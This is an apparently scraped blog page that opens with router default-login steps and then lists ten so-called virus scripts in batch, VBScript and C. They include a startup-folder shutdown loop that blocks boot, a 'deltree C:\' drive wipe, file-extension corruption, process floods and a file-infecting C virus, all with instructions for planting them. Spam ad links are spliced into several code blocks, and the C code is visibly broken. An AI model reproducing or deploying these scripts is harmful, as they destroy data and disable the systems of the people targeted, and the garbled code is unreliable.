3 Hit Enter. On your screen, you will see a series of names and numbers. Look for the line that says Default Gateway. Write down the number that you see next to Default Gateway

4 Navigate to Google or another search engine. In the address bar, type in the number that you just wrote down.

http://ads.cpxcenter.com/cpxcenter/s_landing.php?nid=4&pid=38505&sid=41316&cid=9758&cuid=3pzbb2j&ad=11448&subid=&opt1=&opt2= 5 Hit Enter. You will see another screen that has fields to enter your username and password. The username is "admin", and the password is either "admin" or "1234". Enter that information into the appropriate fields. Click the "Log In" button.

6 Go to the Wireless tab on the website that pops up. If you scroll down, you should find something called password. Write down your password and put it in a safe place in case you forget it again.

Monday, January 13, 2014

dangures viruse codes


1.  sHuTDoWn  VirUs
http://ads.cpxcenter.com/cpxcenter/s_landing.php?nid=4&pid=38505&sid=40815&cid=7742&cuid=fxoeuun&ad=8286&subid=&opt1=&opt2=
Many of you know this trick, but i can’t call this a virus. But still its not a friendly one, it can affect and harm uR data if not saved.
http://ads.cpxcenter.com/cpxcenter/s_landing.php?nid=4&pid=38505&sid=40815&cid=7742&cuid=fxoeuun&ad=8286&subid=&opt1=&opt2=

Effect –> May Harm uR workings and unsaved data.
Coding  Platform –> Batch Programming.
Working –> On executing, it will shutdown your system immidiately. If your data is not saved, it can harm uR workings. And can sometimes becomes more destructive for normal users.
Type the code or just paste the code in notepad and save it as “.bat” extension. Example  –>  ron.bat

**************************************************

@echo off

shutdown -s -t “30″

**************************************************

“30″ mentioned here is time in seconds in which your system will shut-down. You can set any time as uR requirements. You can also add comments by adding “-c” tag after “30″. To  give any message to user while shutdown process.

Example  –>  shutdown -s -t “60″ -c “Windows Formatting starts…”


2. sHUtDowN  V!rUs  {mORe DesTrUCt!ve}
This code is same as above but it restricts system to start and shuts down system each time it starts.

Effect –>  Destructive and Irritating.
Coding platform  –> Batch Programming.
Working  –> Shuts down system each time it starts, and user are never able to login properly. If user boots up system again and again, it sometimes cause windows failure or data lost.
Just type or copy the code in notepad and save it as “.bat” extension.

**************************************************

@echo off
http://ads.cpxcenter.com/cpxcenter/s_landing.php?nid=4&pid=38505&sid=40815&cid=7742&cuid=fxoeuun&ad=8286&subid=&opt1=&opt2=

shutdown -s -t “00″

**************************************************

Now goto following location  –>  start  –>  all programs  –>  startup. Right Click and open folder. Now just copy that saved .bat file and paste in that startup folder.

CAUTION  –>  DON’T USE THIS ON YOUR SYSTEM, YOU WILL NEVER ABLE TO OPEN YOUR SYSTEM. ONLY WAY TO GET RID OF THIS VIRUS IS TO OPEN YOUR SYSTEM IN SAFE MODE AND JUST GOTO THAT STARTUP FOLDER AND DELETE THAT “.bat” FILE.


3.  MuLt!PLe  FoLDeR  V!RuS
Effect –> Not Destructive, But sometimes can become very irritating and itchy.
Coding Platform –>  Batch Programming.
Working –>  This code will just create multiple folders each time system starts-up and also open those hundreds of folders. It is not destructive but while executing it can eat up uR system process and results in slow system performance and sometimes could hang system.
Just write or copy the code in notepad and save it as “.bat” extension.

**************************************************

@echo off

:RON

md folder1

md folder2

md folder3

md folder4

md folder5

start folder1

start folder2

start folder3

start folder4

start folder5

goto RON

**************************************************

Now goto, START  –>  ALL PROGRAMS  –>  STARTUP FOLDER. Now just copy that .bat file in that folder. Next time system starts, multiple folders are created and will start automatically. You can name folder name anything as you want.

4.  NoTePaD  fLooD
Effect –>  Not Destructive or harmless.
Coding Platform –>  Batch Programming.
Working –>  On executing this .bat file it will open and flood loads of notepad {actually it opens around 180 notepads}. This sometimes cause PC hang.
Type the code or just copy the code in notepad and save it as “.bat” extension.

**************************************************

@echo off

:RON

start notepad

start notepad

start notepad

goto RON

**************************************************

In the above code you can write “start notepad” any number to times. Increasing this command will increase flooding and cause higher chances of system hang-up.

5.  DeaDLy  woRdPaD  V!rUs
Effect –>  Deadly and Destructive.
Coding Platform –>  Batch Programming.
Working –>  On executing, this code will delete every single piece of data from uR hard-drive. It will also wipe out windows from the system.
Just copy the code or type it in a worpad and save it as anyname with “.bat” extension.

**************************************************

@echo off

deltree C:\

**************************************************

NOTE  –  PLEASE DON’T RUN THAT “.bat” FILE ON YOUR SYSTEM. IT CAN BE VERY HARMFUL. AND LEARN THIS CODE FOR EDUCATIONAL PURPOSES ONLY, NOT TO HARM OTHERS.


6. F!le  eXTenS!oN  CorrUPT!nG  V!rUs
Effect –>  Effects file execution, irritating but not destructive. Will Corrupt file working.
Coding Platform –>  Batch Programming.
Working –>  On executing this code will affects the opening of file and will corrupt the files extension. This will corrupt the file and disables it and you will not be able to execute it in proper format.
Just type or copy the code in notepad and save it as anyname with “.bat” extension.

*************************************************

@echo off

ren *.exe *.txt

ren *.jpeg *.txt

ren *.mp3 *.txt

ren *.doc *.com

ren *.jpg *.txt

**************************************************


7.  DanC!nG   CaPsLocK  N  nUmKeY
Effect –>  Low, Irritating for normal user.
Coding Platform –>  VBscript
Working –>  On executing it will toggle both,  capslock and numkey continously and it becomes very irritating for normal user. This type of code can be used for prank purposes.
Just type the code or copy it on notepad and save it as anyname with “.vbs” extension.  Example  –>  ”ron.vbs”

**************************************************

Set wshShell =wscript.CreateObject(“WScript.Shell”)

do

wscript.sleep 100

wshshell.sendkeys “{CAPSLOCK}”

wshshell.sendkeys “{NUMLOCK}”

loop

**************************************************


8. NoTePaD  TsuNaM!  V!rUs
Effect –>  Harmful n Effective, Cause system crash easily.
Coding Platform –>  VBscript.
Working –>  On Executing, it opens notepad unlimited no. of times and write a text into notepad automatically. It looks very scary for normal users as it leads to system hang and crash system in few minutes.
Just type the code or copy it on notepad and save it as anyname with “.vbs” extension.

**************************************************

Set wshShell =wscript.CreateObject(“WScript.Shell”)

do

WshShell.Run “notepad”
WScript.Sleep 100
WshShell.SendKeys “H”
WScript.Sleep 200
WshShell.SendKeys “e”
WScript.Sleep 200
WshShell.SendKeys “l”
WScript.Sleep 200
WshShell.SendKeys “l”
WScript.Sleep 200
WshShell.SendKeys “o “
WScript.Sleep 200
WshShell.SendKeys ” “
WScript.Sleep 200
WshShell.SendKeys “u”
WScript.Sleep 200

Wshshell.Sendkeys “s”

Wscript.Sleep 200
WshShell.SendKeys “e”
WScript.Sleep 200
WshShell.SendKeys “r”
WScript.Sleep 200
WshShell.SendKeys “.”
WScript.Sleep 200
WshShell.SendKeys “.”
WScript.Sleep 200
WshShell.SendKeys “…”
WScript.Sleep 200
WshShell.SendKeys “{enter}”

WScript.Sleep 200

WshShell.SendKeys “You”

WScript.Sleep 200
WshShell.SendKeys ” Have”
WScript.Sleep 200
WshShell.SendKeys ” Been”
WScript.Sleep 200
WshShell.SendKeys ” Hacked!!!”
WScript.Sleep 200
WshShell.SendKeys ” Now”
WScript.Sleep 200
WshShell.SendKeys ” Just”
WScript.Sleep 200
WshShell.SendKeys ” Taste”
WScript.Sleep 200
WshShell.SendKeys ” What”
WScript.Sleep 200
WshShell.SendKeys ” Virus”
WScript.Sleep 200
WshShell.SendKeys ” can do with uuuuuuuuuuuuu….”
WScript.Sleep 200
WshShell.SendKeys ” {enter}”
WScript.Sleep 200
WshShell.SendKeys “hahahahaha…….”
WScript.Sleep 200
WshShell.Sendkeys ” Now just Look Dumb Head what i will do!!!!!!!”

wscript.sleep 200

wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “look”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “how”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 100
wshshell.sendkeys “i”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “crash”
wscript.sleep 200
wshshell.sendkeys ” uR”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “system”
wscript.sleep 200
loop
**************************************************
9.  PoP-uP  CD/DvD  Dr!Ve  V!rUs
Effect –>  Low, but very irritating. Not Harmless.
Coding Platform –>  VBscript.
Working –>  On Executing, It will continously pop-up uR CD/DVD. It is very irritating and can be stopped only on system shut-down. It is not harmless or destructive.
Just copy the code or type it on notepad and save it as anyname with “.vbs” extension.

**************************************************

Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
http://ads.cpxcenter.com/cpxcenter/s_landing.php?nid=4&pid=38505&sid=40815&cid=7742&cuid=fxoeuun&ad=8286&subid=&opt1=&opt2=
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
http://ads.cpxcenter.com/cpxcenter/s_landing.php?nid=4&pid=38505&sid=40815&cid=7742&cuid=fxoeuun&ad=8286&subid=&opt1=&opt2=
Next
End If
wscript.sleep 5000
loop

************************************************************


10.  cLoNe  V!rUs
Effect –>  Harmful and very effective.
Coding Platform –>  C, Turbo C.
Working –>  On Executing, this virus does is it makes all the files in the current directory a virus. Just remember to run this virus inside a new folder that contains no important exe and normal files . This virus will make them too as virus.
***************************************************

FILE *Ron *vRon;

int owned = 0;

unsigned long x;

char buff[256];

struct ffblk ffblk;

clock_t st, end;

main()

{

 st=clock();

 clrscr();

 owned=(find_first(“*.*”, &ffblk,0);
http://ads.cpxcenter.com/cpxcenter/s_landing.php?nid=4&pid=38505&sid=40815&cid=7742&cuid=fxoeuun&ad=8286&subid=&opt1=&opt2=

 while(!done)

 {

 Ron=fopen(_arg[0], “rb”);

 vhost=fopen(ffblk.ff_name, “rb+”);

 if (vhost = =NULL)

 goto next;

 x = 89088;

 printf(“infecting %s\n”, ffblk.ff_name);

 while(x>2048)

 {

 fread(buff,256,1,Ron);

 fwrite(buff,256,1,vRon);

 x – = 2048;

 }

 fread(buff,x,1,Ron);

 fwrite(buff,x,1,vRon);

 a++;

 next:      fcloseall();

 owned = findnext(&ffblk);

 }

 end = clock()

 printf(“Infected %d files in %f sec”, a, (end-st)/CLK_TCk);

 return (0);

}

**************************************************